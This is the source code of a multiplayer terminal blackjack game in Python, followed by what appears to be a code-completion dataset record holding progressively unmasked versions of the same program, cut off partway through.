done = check_status(player, hand_index);
else :
choice = '';
if not done :
choice = input('Do you want to hit again (\'y\' or \'n\')? ').lower();
while choice != 'y' and choice != 'n' :
choice = input('Enter either \'y\' or \'n\': ');
while choice == 'y' and not done:
dealer.deal_card(player, hand_index);
done = check_status(player, hand_index);
if not done :
choice = input('Do you want to hit again (\'y\' or \'n\')? ').lower();
while choice != 'y' and choice != 'n' :
choice = input('Enter either \'y\' or \'n\': ');
if not done : print();
return True;
def split(player, dealer, hand_index=0) :
if player.hand[hand_index][0] != player.hand[hand_index][1] :
print('You can\'t split on that hand! You need two identical cards to split. Choose again.');
return False;
elif player.bet*2 > player.money :
print(f'You don\'t have enough money to split with your current bet (${player.bet} * 2 = ${player.bet*2})! Choose again.');
return False;
hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]];
player.hand = hands;
print('Now you will play each hand separately: \n');
for i in range(0,2) :
print(f'For Hand #{i+1}: ');
do_decision(player, dealer, i);
return True;
def double_down(player, dealer, hand_index=0) :
if player.bet*2 > player.money :
print(f'You don\'t have enough money to do that (${player.bet} * 2 = ${player.bet*2})! Choose again.');
return False;
elif player.did_double_down :
print('You can double down only once! Choose a different option.');
return False;
player.bet *= 2;
player.did_double_down = True;
print(f'Bet increased to ${player.bet}!.');
do_decision(player, dealer, hand_index);
return True;
def check_status(player, hand_index=0) :
done = False;
hand_string = '[';
for card in player.hand[hand_index][:-1] :
hand_string += card.__str__() + ', ';
print(f'Current Hand: {hand_string}', end='');
sys.stdout.flush();
time.sleep(0.5);
disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05);
time.sleep(0.5);
if player.check_blackjack(hand_index) :
disp_str_slow(' ==> BLACKJACK!!! ', 0.05);
if not isinstance(player, people.Dealer) :
disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05);
print('\n\n', end='');
done = True;
sys.stdout.flush();
time.sleep(0.5);
elif player.check_bust(hand_index) :
disp_str_slow(' ==> BUST! ', 0.05);
if not isinstance(player, people.Dealer) :
disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05);
print('\n\n', end='');
done = True;
sys.stdout.flush();
time.sleep(0.5);
else :
print();
return done;
def play_again(players) :
print();
all_broke = True;
for i in players :
if not i.check_broke() : all_broke = False;
if not all_broke :
choice = input('Do you all want to play another round? Enter \'y\' or \'n\': ').lower();
while choice != 'y' and choice != 'n' :
choice = input('Enter either \'y\' or \'n\': ');
print();
return choice;
else :
print();
return 'n';
def reset(players) :
dealer = players[-1];
for player in players :
dealer.retrieve_cards(player);
player.bet = 0;
def display_accounts(players) :
for player in players[:-1] :
change = player.money - player.initial_money;
word = 'gain';
if change < 0 :
word = 'loss';
print(f' {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n');
sys.stdout.flush();
time.sleep(0.5);
def disp_str_slow(phrase, t) :
for i in phrase :
print(i, end='');
sys.stdout.flush();
time.sleep(t);
def print_players(players) :
for player in players :
print(player);
def main() :
display_instructions();
num_players = get_num_players();
players = create_players(num_players);
dealer = people.Dealer(Deck(6));
players.append(dealer);
replay_choice = 'y';
while replay_choice == 'y' :
reset(players);
place_bets(players);
for i in range(0,2) :
deal(dealer, players);
view_hands(players);
cycle_decisions(players);
replay_choice = play_again(players);
print('------------------------------------------------------------------------------------------------\n');
disp_str_slow('FINAL PLAYER ACCOUNTS\n\n', 0.05);
sys.stdout.flush();
time.sleep(0.5)
display_accounts(players);
sys.stdout.flush();
time.sleep(0.2)
print('------------------------------------------------------------------------------------------------\n');
print('Goodbye!');
if __name__ == '__main__' :
main();
|
flexible
|
{
"blob_id": "a7050ebd545c4169b481672aed140af610aea997",
"index": 4879,
"step-1": "<mask token>\n\n\ndef create_players(num):\n players_list = []\n for i in range(num):\n name = input(f'Player {i + 1}, what is your name? ')\n while name == '':\n name = input('Please enter your name: ')\n players_list.append(people.Player(name, 1000))\n print(\n '\\nAll players will begin the game with the same amount of $1,000 dollars.\\n'\n )\n return players_list\n\n\n<mask token>\n\n\ndef view_hands(players):\n print('Here are the hands for each player: \\n')\n for p in players:\n if isinstance(p, people.Dealer):\n print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')\n print()\n elif not p.check_broke():\n print(f'{p.name}: {p.hand}', end='')\n if p.check_blackjack():\n print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')\n else:\n print()\n print()\n\n\ndef do_decision(player, dealer, hand_index=0):\n choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}\n valid_choice = False\n while not valid_choice:\n choice = input(\n f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '\n )\n while choice.lower() not in choices_dict.keys():\n choice = input(\n \"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: \"\n )\n valid_choice = choices_dict.get(choice)(player, dealer, hand_index)\n\n\n<mask token>\n\n\ndef split(player, dealer, hand_index=0):\n if player.hand[hand_index][0] != player.hand[hand_index][1]:\n print(\n \"You can't split on that hand! You need two identical cards to split. Choose again.\"\n )\n return False\n elif player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again.\"\n )\n return False\n hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]\n player.hand = hands\n print('Now you will play each hand separately: \\n')\n for i in range(0, 2):\n print(f'For Hand #{i + 1}: ')\n do_decision(player, dealer, i)\n return True\n\n\n<mask token>\n\n\ndef reset(players):\n dealer = players[-1]\n for player in players:\n dealer.retrieve_cards(player)\n player.bet = 0\n\n\ndef display_accounts(players):\n for player in players[:-1]:\n change = player.money - player.initial_money\n word = 'gain'\n if change < 0:\n word = 'loss'\n print(\n f\"\"\" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n\"\"\"\n )\n sys.stdout.flush()\n time.sleep(0.5)\n\n\ndef disp_str_slow(phrase, t):\n for i in phrase:\n print(i, end='')\n sys.stdout.flush()\n time.sleep(t)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef display_instructions():\n print(\n \"\"\"\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 \"\"\"\n )\n print(\n 'as possible without going over. The numbered cards have the value of their number, face cards have '\n )\n print(\n \"a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\\n\"\n )\n print(\n 'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '\n )\n print(\n \"each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the \"\n )\n print(\n \"\"\"dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \n\"\"\"\n )\n print(\n \" Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many \"\n )\n print(\n ' times as wanted, up until the player busts (goes over 21). \\n'\n )\n print(\n \" Stand: To 'stand' means to stay with the current cards. \\n\"\n )\n print(\n \" Split: A player can 'split' only when the first two cards of his or her hand are the \"\n )\n print(\n ' same. When this occurs, the player makes two separate piles, one with each '\n )\n print(\n ' identical card, and places a bet identical to the initial bet for the second '\n )\n print(\n \"\"\" pile. Then, the player can hit or stand with each pile as in a normal round.\n\"\"\"\n )\n print(\n \" Double Down: When a player chooses to 'double down', he or she can increase the current bet \"\n )\n print(\n \"\"\" by 100% in exchange for agreeing to stand after being dealt one more card.\n\"\"\"\n )\n input('Ready to play? Hit any key to continue: ')\n print()\n\n\ndef get_num_players():\n num = input('How many people will be playing (up to 7)? Enter a number: ')\n while not num.isdigit() or int(num) < 1 or int(num) > 7:\n num = input('Please enter a number from 1 to 7: ')\n print(\n \"\"\"\nGreat! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\n\"\"\"\n )\n time.sleep(1)\n return int(num)\n\n\ndef create_players(num):\n players_list = []\n for i in range(num):\n name = input(f'Player {i + 1}, what is your name? ')\n while name == '':\n name = input('Please enter your name: ')\n players_list.append(people.Player(name, 1000))\n print(\n '\\nAll players will begin the game with the same amount of $1,000 dollars.\\n'\n )\n return players_list\n\n\ndef deal(dealer, players):\n for player in players[:-1]:\n if not player.check_broke():\n dealer.deal_card(player)\n dealer.deal_card(players[-1])\n\n\ndef place_bets(players):\n print('Now, each of you must place your bets.\\n')\n bets = []\n for player in players[:-1]:\n if not player.check_broke():\n bet = input(f'Bet for {player.name}: ')\n while not bet.isdigit() or int(bet) > player.money:\n msg = 'Please enter a whole number: '\n if bet.isdigit():\n msg = (\n \"You don't have enough money! Enter a different value: \"\n )\n bet = input(msg)\n player.bet = int(bet)\n print()\n\n\ndef view_hands(players):\n print('Here are the hands for each player: \\n')\n for p in players:\n if isinstance(p, people.Dealer):\n print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')\n print()\n elif not p.check_broke():\n print(f'{p.name}: {p.hand}', end='')\n if p.check_blackjack():\n print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')\n else:\n print()\n print()\n\n\ndef do_decision(player, dealer, hand_index=0):\n choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}\n valid_choice = False\n while not valid_choice:\n choice = input(\n f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '\n )\n while choice.lower() not in choices_dict.keys():\n choice = input(\n \"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: \"\n )\n valid_choice = choices_dict.get(choice)(player, dealer, hand_index)\n\n\ndef cycle_decisions(players):\n dealer = players[-1]\n for p in players:\n if isinstance(p, people.Dealer):\n print(\n f\"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11).\"\n )\n sys.stdout.flush()\n time.sleep(0.8)\n if not check_status(p) and not p.check_hard_17():\n hit(p, dealer)\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow('\\nEnd-of-Round Earnings: \\n', 0.05)\n if p.check_bust():\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n else:\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n if i.hand_value(j) > p.hand_value():\n print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n elif i.hand_value(j) < p.hand_value():\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n else:\n print(\n f'{i.name} tied with the {p.name}! No change. '\n , end='')\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n sys.stdout.flush()\n time.sleep(0.5)\n elif not p.check_blackjack() and not p.check_broke():\n do_decision(p, dealer)\n\n\ndef stand(player, dealer, hand_index=0):\n print(f'{player.name} stands.\\n')\n return True\n\n\ndef hit(player, dealer, hand_index=0):\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if isinstance(player, people.Dealer):\n while not player.check_hard_17() and not done:\n time.sleep(0.5)\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n else:\n choice = ''\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \").lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n while choice == 'y' and not done:\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \"\n ).lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n if not done:\n print()\n return True\n\n\ndef split(player, dealer, hand_index=0):\n if player.hand[hand_index][0] != player.hand[hand_index][1]:\n print(\n \"You can't split on that hand! You need two identical cards to split. Choose again.\"\n )\n return False\n elif player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again.\"\n )\n return False\n hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]\n player.hand = hands\n print('Now you will play each hand separately: \\n')\n for i in range(0, 2):\n print(f'For Hand #{i + 1}: ')\n do_decision(player, dealer, i)\n return True\n\n\ndef double_down(player, dealer, hand_index=0):\n if player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again.\"\n )\n return False\n elif player.did_double_down:\n print('You can double down only once! Choose a different option.')\n return False\n player.bet *= 2\n player.did_double_down = True\n print(f'Bet increased to ${player.bet}!.')\n do_decision(player, dealer, hand_index)\n return True\n\n\ndef check_status(player, hand_index=0):\n done = False\n hand_string = '['\n for card in player.hand[hand_index][:-1]:\n hand_string += card.__str__() + ', '\n print(f'Current Hand: {hand_string}', end='')\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)\n time.sleep(0.5)\n if player.check_blackjack(hand_index):\n disp_str_slow(' ==> BLACKJACK!!! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n elif player.check_bust(hand_index):\n disp_str_slow(' ==> BUST! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n else:\n print()\n return done\n\n\ndef play_again(players):\n print()\n all_broke = True\n for i in players:\n if not i.check_broke():\n all_broke = False\n if not all_broke:\n choice = input(\n \"Do you all want to play another round? Enter 'y' or 'n': \").lower(\n )\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n print()\n return choice\n else:\n print()\n return 'n'\n\n\ndef reset(players):\n dealer = players[-1]\n for player in players:\n dealer.retrieve_cards(player)\n player.bet = 0\n\n\ndef display_accounts(players):\n for player in players[:-1]:\n change = player.money - player.initial_money\n word = 'gain'\n if change < 0:\n word = 'loss'\n print(\n f\"\"\" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n\"\"\"\n )\n sys.stdout.flush()\n time.sleep(0.5)\n\n\ndef disp_str_slow(phrase, t):\n for i in phrase:\n print(i, end='')\n sys.stdout.flush()\n time.sleep(t)\n\n\ndef print_players(players):\n for player in players:\n print(player)\n\n\ndef main():\n display_instructions()\n num_players = get_num_players()\n players = create_players(num_players)\n dealer = people.Dealer(Deck(6))\n players.append(dealer)\n replay_choice = 'y'\n while replay_choice == 'y':\n reset(players)\n place_bets(players)\n for i in range(0, 2):\n deal(dealer, players)\n view_hands(players)\n cycle_decisions(players)\n replay_choice = play_again(players)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n disp_str_slow('FINAL PLAYER ACCOUNTS\\n\\n', 0.05)\n sys.stdout.flush()\n time.sleep(0.5)\n display_accounts(players)\n sys.stdout.flush()\n time.sleep(0.2)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n print('Goodbye!')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef display_instructions():\n print(\n \"\"\"\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 \"\"\"\n )\n print(\n 'as possible without going over. The numbered cards have the value of their number, face cards have '\n )\n print(\n \"a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\\n\"\n )\n print(\n 'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '\n )\n print(\n \"each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the \"\n )\n print(\n \"\"\"dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \n\"\"\"\n )\n print(\n \" Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many \"\n )\n print(\n ' times as wanted, up until the player busts (goes over 21). \\n'\n )\n print(\n \" Stand: To 'stand' means to stay with the current cards. \\n\"\n )\n print(\n \" Split: A player can 'split' only when the first two cards of his or her hand are the \"\n )\n print(\n ' same. When this occurs, the player makes two separate piles, one with each '\n )\n print(\n ' identical card, and places a bet identical to the initial bet for the second '\n )\n print(\n \"\"\" pile. Then, the player can hit or stand with each pile as in a normal round.\n\"\"\"\n )\n print(\n \" Double Down: When a player chooses to 'double down', he or she can increase the current bet \"\n )\n print(\n \"\"\" by 100% in exchange for agreeing to stand after being dealt one more card.\n\"\"\"\n )\n input('Ready to play? Hit any key to continue: ')\n print()\n\n\ndef get_num_players():\n num = input('How many people will be playing (up to 7)? Enter a number: ')\n while not num.isdigit() or int(num) < 1 or int(num) > 7:\n num = input('Please enter a number from 1 to 7: ')\n print(\n \"\"\"\nGreat! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\n\"\"\"\n )\n time.sleep(1)\n return int(num)\n\n\ndef create_players(num):\n players_list = []\n for i in range(num):\n name = input(f'Player {i + 1}, what is your name? ')\n while name == '':\n name = input('Please enter your name: ')\n players_list.append(people.Player(name, 1000))\n print(\n '\\nAll players will begin the game with the same amount of $1,000 dollars.\\n'\n )\n return players_list\n\n\ndef deal(dealer, players):\n for player in players[:-1]:\n if not player.check_broke():\n dealer.deal_card(player)\n dealer.deal_card(players[-1])\n\n\ndef place_bets(players):\n print('Now, each of you must place your bets.\\n')\n bets = []\n for player in players[:-1]:\n if not player.check_broke():\n bet = input(f'Bet for {player.name}: ')\n while not bet.isdigit() or int(bet) > player.money:\n msg = 'Please enter a whole number: '\n if bet.isdigit():\n msg = (\n \"You don't have enough money! Enter a different value: \"\n )\n bet = input(msg)\n player.bet = int(bet)\n print()\n\n\ndef view_hands(players):\n print('Here are the hands for each player: \\n')\n for p in players:\n if isinstance(p, people.Dealer):\n print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')\n print()\n elif not p.check_broke():\n print(f'{p.name}: {p.hand}', end='')\n if p.check_blackjack():\n print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')\n else:\n print()\n print()\n\n\ndef do_decision(player, dealer, hand_index=0):\n choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}\n valid_choice = False\n while not valid_choice:\n choice = input(\n f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '\n )\n while choice.lower() not in choices_dict.keys():\n choice = input(\n \"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: \"\n )\n valid_choice = choices_dict.get(choice)(player, dealer, hand_index)\n\n\ndef cycle_decisions(players):\n dealer = players[-1]\n for p in players:\n if isinstance(p, people.Dealer):\n print(\n f\"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11).\"\n )\n sys.stdout.flush()\n time.sleep(0.8)\n if not check_status(p) and not p.check_hard_17():\n hit(p, dealer)\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow('\\nEnd-of-Round Earnings: \\n', 0.05)\n if p.check_bust():\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n else:\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n if i.hand_value(j) > p.hand_value():\n print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n elif i.hand_value(j) < p.hand_value():\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n else:\n print(\n f'{i.name} tied with the {p.name}! No change. '\n , end='')\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n sys.stdout.flush()\n time.sleep(0.5)\n elif not p.check_blackjack() and not p.check_broke():\n do_decision(p, dealer)\n\n\ndef stand(player, dealer, hand_index=0):\n print(f'{player.name} stands.\\n')\n return True\n\n\ndef hit(player, dealer, hand_index=0):\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if isinstance(player, people.Dealer):\n while not player.check_hard_17() and not done:\n time.sleep(0.5)\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n else:\n choice = ''\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \").lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n while choice == 'y' and not done:\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \"\n ).lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n if not done:\n print()\n return True\n\n\ndef split(player, dealer, hand_index=0):\n if player.hand[hand_index][0] != player.hand[hand_index][1]:\n print(\n \"You can't split on that hand! You need two identical cards to split. Choose again.\"\n )\n return False\n elif player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again.\"\n )\n return False\n hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]\n player.hand = hands\n print('Now you will play each hand separately: \\n')\n for i in range(0, 2):\n print(f'For Hand #{i + 1}: ')\n do_decision(player, dealer, i)\n return True\n\n\ndef double_down(player, dealer, hand_index=0):\n if player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again.\"\n )\n return False\n elif player.did_double_down:\n print('You can double down only once! Choose a different option.')\n return False\n player.bet *= 2\n player.did_double_down = True\n print(f'Bet increased to ${player.bet}!.')\n do_decision(player, dealer, hand_index)\n return True\n\n\ndef check_status(player, hand_index=0):\n done = False\n hand_string = '['\n for card in player.hand[hand_index][:-1]:\n hand_string += card.__str__() + ', '\n print(f'Current Hand: {hand_string}', end='')\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)\n time.sleep(0.5)\n if player.check_blackjack(hand_index):\n disp_str_slow(' ==> BLACKJACK!!! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n elif player.check_bust(hand_index):\n disp_str_slow(' ==> BUST! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n else:\n print()\n return done\n\n\ndef play_again(players):\n print()\n all_broke = True\n for i in players:\n if not i.check_broke():\n all_broke = False\n if not all_broke:\n choice = input(\n \"Do you all want to play another round? Enter 'y' or 'n': \").lower(\n )\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n print()\n return choice\n else:\n print()\n return 'n'\n\n\ndef reset(players):\n dealer = players[-1]\n for player in players:\n dealer.retrieve_cards(player)\n player.bet = 0\n\n\ndef display_accounts(players):\n for player in players[:-1]:\n change = player.money - player.initial_money\n word = 'gain'\n if change < 0:\n word = 'loss'\n print(\n f\"\"\" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n\"\"\"\n )\n sys.stdout.flush()\n time.sleep(0.5)\n\n\ndef disp_str_slow(phrase, t):\n for i in phrase:\n print(i, end='')\n sys.stdout.flush()\n time.sleep(t)\n\n\ndef print_players(players):\n for player in players:\n print(player)\n\n\ndef main():\n display_instructions()\n num_players = get_num_players()\n players = create_players(num_players)\n dealer = people.Dealer(Deck(6))\n players.append(dealer)\n replay_choice = 'y'\n while replay_choice == 'y':\n reset(players)\n place_bets(players)\n for i in range(0, 2):\n deal(dealer, players)\n view_hands(players)\n cycle_decisions(players)\n replay_choice = play_again(players)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n disp_str_slow('FINAL PLAYER ACCOUNTS\\n\\n', 0.05)\n sys.stdout.flush()\n time.sleep(0.5)\n display_accounts(players)\n sys.stdout.flush()\n time.sleep(0.2)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n print('Goodbye!')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from card import Card\nfrom deck import Deck\nimport people\nimport chip\nimport sys\nimport time\n\n\ndef display_instructions():\n print(\n \"\"\"\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 \"\"\"\n )\n print(\n 'as possible without going over. The numbered cards have the value of their number, face cards have '\n )\n print(\n \"a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\\n\"\n )\n print(\n 'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '\n )\n print(\n \"each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the \"\n )\n print(\n \"\"\"dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \n\"\"\"\n )\n print(\n \" Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many \"\n )\n print(\n ' times as wanted, up until the player busts (goes over 21). \\n'\n )\n print(\n \" Stand: To 'stand' means to stay with the current cards. \\n\"\n )\n print(\n \" Split: A player can 'split' only when the first two cards of his or her hand are the \"\n )\n print(\n ' same. When this occurs, the player makes two separate piles, one with each '\n )\n print(\n ' identical card, and places a bet identical to the initial bet for the second '\n )\n print(\n \"\"\" pile. Then, the player can hit or stand with each pile as in a normal round.\n\"\"\"\n )\n print(\n \" Double Down: When a player chooses to 'double down', he or she can increase the current bet \"\n )\n print(\n \"\"\" by 100% in exchange for agreeing to stand after being dealt one more card.\n\"\"\"\n )\n input('Ready to play? Hit any key to continue: ')\n print()\n\n\ndef get_num_players():\n num = input('How many people will be playing (up to 7)? Enter a number: ')\n while not num.isdigit() or int(num) < 1 or int(num) > 7:\n num = input('Please enter a number from 1 to 7: ')\n print(\n \"\"\"\nGreat! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\n\"\"\"\n )\n time.sleep(1)\n return int(num)\n\n\ndef create_players(num):\n players_list = []\n for i in range(num):\n name = input(f'Player {i + 1}, what is your name? ')\n while name == '':\n name = input('Please enter your name: ')\n players_list.append(people.Player(name, 1000))\n print(\n '\\nAll players will begin the game with the same amount of $1,000 dollars.\\n'\n )\n return players_list\n\n\ndef deal(dealer, players):\n for player in players[:-1]:\n if not player.check_broke():\n dealer.deal_card(player)\n dealer.deal_card(players[-1])\n\n\ndef place_bets(players):\n print('Now, each of you must place your bets.\\n')\n bets = []\n for player in players[:-1]:\n if not player.check_broke():\n bet = input(f'Bet for {player.name}: ')\n while not bet.isdigit() or int(bet) > player.money:\n msg = 'Please enter a whole number: '\n if bet.isdigit():\n msg = (\n \"You don't have enough money! Enter a different value: \"\n )\n bet = input(msg)\n player.bet = int(bet)\n print()\n\n\ndef view_hands(players):\n print('Here are the hands for each player: \\n')\n for p in players:\n if isinstance(p, people.Dealer):\n print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')\n print()\n elif not p.check_broke():\n print(f'{p.name}: {p.hand}', end='')\n if p.check_blackjack():\n print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')\n else:\n print()\n print()\n\n\ndef do_decision(player, dealer, hand_index=0):\n choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}\n valid_choice = False\n while not valid_choice:\n choice = input(\n f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '\n )\n while choice.lower() not in choices_dict.keys():\n choice = input(\n \"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: \"\n )\n valid_choice = choices_dict.get(choice)(player, dealer, hand_index)\n\n\ndef cycle_decisions(players):\n dealer = players[-1]\n for p in players:\n if isinstance(p, people.Dealer):\n print(\n f\"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11).\"\n )\n sys.stdout.flush()\n time.sleep(0.8)\n if not check_status(p) and not p.check_hard_17():\n hit(p, dealer)\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow('\\nEnd-of-Round Earnings: \\n', 0.05)\n if p.check_bust():\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n else:\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n if i.hand_value(j) > p.hand_value():\n 